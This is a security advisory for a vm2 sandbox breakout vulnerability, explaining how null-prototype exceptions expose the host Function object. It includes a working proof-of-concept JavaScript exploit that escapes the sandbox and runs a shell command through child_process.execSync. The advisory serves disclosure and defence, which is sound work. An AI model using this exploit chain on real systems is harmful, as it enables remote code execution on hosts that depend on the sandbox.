OSV 1.4.0 · github-reviewed · 修改于 2026-05-15 04:37
发布时间
2026-05-09 00:20
GitHub 审查时间
2026-05-09 00:20
NVD 发布时间
2026-05-14 02:16
源文件
advisories/github-reviewed/2026/05/GHSA-9vg3-4rfj-wgcm/GHSA-9vg3-4rfj-wgcm.json
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
In handleException due to // SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`) exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host Function object.
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const o = {__proto__: null};
try {
throw o;
} catch (e) {
e.f = Buffer.prototype.inspect
o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
`));
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.